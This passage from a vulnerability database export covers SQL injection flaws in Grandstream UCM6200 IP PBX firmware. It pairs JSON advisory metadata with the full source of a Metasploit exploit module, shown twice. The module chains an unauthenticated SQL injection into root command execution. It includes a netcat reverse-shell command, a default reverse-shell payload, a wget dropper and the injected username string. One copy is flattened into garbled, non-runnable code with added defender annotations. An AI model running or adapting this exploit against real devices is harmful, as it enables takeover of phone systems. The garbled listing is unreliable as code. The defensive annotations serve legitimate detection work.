            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5724",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003469",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-20680",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1714",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-5724",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the application not validating externally supplied input before using it in SQL statements. Attackers can use this vulnerability to execute unauthorized SQL commands.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5724"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5724",
        "trust": 3.1
      },
      {
        "db": "TENABLE",
        "id": "TRA-2020-17",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5724",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "id": "VAR-202003-1437",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      }
    ],
    "trust": 1.45714287
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      }
    ]
  },
  "last_update_date": "2024-02-13T22:30:30.301000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.grandstream.com/"
      },
      {
        "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-20680)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/211859"
      },
      {
        "title": "Repair measures for Grandstream UCM6200 SQL injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113109"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://www.tenable.com/security/research/tra-2020-17"
      },
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5724"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5724"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/89.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5724"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      },
      {
        "date": "2020-03-30T20:15:20.087000",
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-05-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5724"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "date": "2020-04-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      },
      {
        "date": "2020-03-30T21:49:40.620000",
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection vulnerabilities in the Grandstream UCM6200 series",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1714"
      }
    ],
    "trust": 0.6
  }
}

VAR-202003-1435

Vulnerability from variot - Updated: 2024-01-18 22:55

The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. An SQL injection vulnerability exists in the Grandstream UCM6200 series. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. The Metasploit module published for this issue follows.

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

# NOTE(review): the page renderer has flattened this listing. Comment markers
# are fused with code and several statements share one line, so it is not
# valid Ruby as shown; the text is left exactly as the page gives it.
#
# Summary for defenders, taken from the listing itself:
#   - Two chained flaws: an unauthenticated SQL injection in the "Forgot
#     Password" username lookup (CVE-2020-5722), then a command injection when
#     that username is handed to sendMail.py through /bin/sh.
#   - Affected for command execution: UCM62xx firmware before 1.0.19.20.
#   - Wire shape: POST to <base path>/cgi, default base path '/', default
#     port 8089 with TLS.
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager

def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices.

      Exploitation happens in two stages:

      1. An SQL injection during username lookup while executing the "Forgot Password" function. 
      2. A command injection that occurs after the user provided username is passed to a Python script
      via the shell. Like so:

      /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
      password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `

      This module affect UCM62xx versions before firmware version 1.0.19.20. 
    },
    'License' => MSF_LICENSE,
    'Author' => [
      'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
    ],
    'References' => [
      [ 'CVE', '2020-5722' ],
      [ 'EDB', '48247']
    ],
    'DisclosureDate' => '2020-03-23',
    'Platform' => ['unix', 'linux'],
    'Arch' => [ARCH_CMD, ARCH_ARMLE],
    'Privileged' => true,
    'Targets' => [
      [
        'Unix Command',
        {
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Type' => :unix_cmd,
          'Payload' => {
            'DisableNops' => true,
            'BadChars' => '\'&|'
          },
          'DefaultOptions' => {
            'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
          }
        }
      ],
      [
        'Linux Dropper',
        {
          'Platform' => 'linux',
          'Arch' => [ARCH_ARMLE],
          'Type' => :linux_dropper,
          'CmdStagerFlavor' => [ 'wget' ]
        }
      ]
    ],
    'DefaultTarget' => 1,
    # The web management service is addressed on TCP 8089 over TLS. That is the
    # interface to inventory and to keep off untrusted networks on unpatched units.
    'DefaultOptions' => {
      'RPORT' => 8089,
      'SSL' => true
    },
    # The module declares that a run leaves indicators in logs and artifacts on
    # disk. Which log files or paths is not shown in this listing; confirm on a
    # test unit before relying on either for triage.
    'Notes' => {
      'Stability' => [CRASH_SAFE],
      'Reliability' => [REPEATABLE_SESSION],
      'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
    }
  )
)
register_options([
  OptString.new('TARGETURI', [true, 'Base path', '/'])
])

end

# check: POSTs action=getInfo to <base path>/cgi and compares the reported
# "prog_version" with 1.0.19.20. It returns Appears below that version and
# Safe otherwise.
# NOTE(review): "Safe" here covers only the command-execution path. The page's
# description says the SQL injection still permits HTML injection into
# password-recovery e-mails before 1.0.20.17, so firmware from 1.0.19.20 up to
# that release should not be treated as fully patched.
# NOTE(review): `return false if prog_version.nil?` is the one exit that does
# not return a CheckCode. The other failure exits return CheckCode::Unknown.
## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } })

return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200

body_json = res.get_json_document
return CheckCode::Unknown('No JSON in response') unless body_json

prog_version = body_json.dig('response', 'prog_version')
return false if prog_version.nil?

vprint_status("The reported version is: #{prog_version}")

version = Rex::Version.new(prog_version)
if version < Rex::Version.new('1.0.19.20')
  return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
end

return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")

end

# execute_command: the injected value travels in the user_name POST parameter
# of action=sendPasswordEmail on <base path>/cgi.
# Detection: that value carries a single quote, an SQL comment marker (--) and
# ';' separators. Presumably no legitimate username lookup contains these, so
# their presence in user_name is a candidate signature (verify against normal
# traffic first).
# The listing's own comment states the server rate-limits this action to at
# most once every 60 seconds, so repeated sendPasswordEmail requests from one
# source are also worth alerting on.
## # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection # and then it will get passed to a python script via sh which allows us to execute a command injection. # It will look something like this: # # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ # password '' cat <<'TTsf7G0' z' or 1=1--;nc 10.0.0.3 4444 -e /bin/sh;TTsf7G0 # # This functionality is related to the"Forgot Password" feature. This function is rate limited by # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few # payloads are appropriate. ### def execute_command(cmd, _opts = {}) rand_num = Rex::Text.rand_text_numeric(1..5) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi'), 'vars_post' => { 'action' => 'sendPasswordEmail', 'user_name' => "' or #{rand_num}=#{rand_num}--;#{cmd};" } }, 5)

# the netcat reverse shell payload holds the connection open. So we'll treat no response
# as a success. The meterpreter payload does not hold the connection open so this clause digs
# deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
# generates an error (e.g. rate limit error)
if res
  fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200

  body_json = res.get_json_document
  fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json

  status_json = body_json['status']
  fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
  fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
end

print_good('Exploit successfully executed.')

end

def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1435",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 1.6,
        "vendor": "grandstream",
        "version": "1.0.19.20"
      },
      {
        "model": "ucm6200",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.19.20"
      },
      {
        "model": "ucm6200",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.17"
      },
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "grandstream",
        "version": "1.0.20.17"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.19.20",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jacob Baines",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-5722",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003190",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-23201",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-5722",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003190",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5722",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003190",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-23201",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1337",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-5722",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  prepend Msf::Exploit::Remote::AutoCheck\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Grandstream UCM62xx IP PBX sendPasswordEmail RCE\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n          a command injection vulnerability (technically, no assigned CVE but was inadvertently\n          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n          series of devices. \n\n          Exploitation happens in two stages:\n\n          1. An SQL injection during username lookup while executing the \"Forgot Password\" function. \n          2. A command injection that occurs after the user provided username is passed to a Python script\n          via the shell. 
Like so:\n\n          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n          password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n          This module affect UCM62xx versions before firmware version 1.0.19.20. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Author\u0027 =\u003e [\n          \u0027jbaines-r7\u0027 # Vulnerability discovery, original exploit, and Metasploit module\n        ],\n        \u0027References\u0027 =\u003e [\n          [ \u0027CVE\u0027, \u00272020-5722\u0027 ],\n          [ \u0027EDB\u0027, \u002748247\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272020-03-23\u0027,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027DisableNops\u0027 =\u003e true,\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027\u0026|\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e 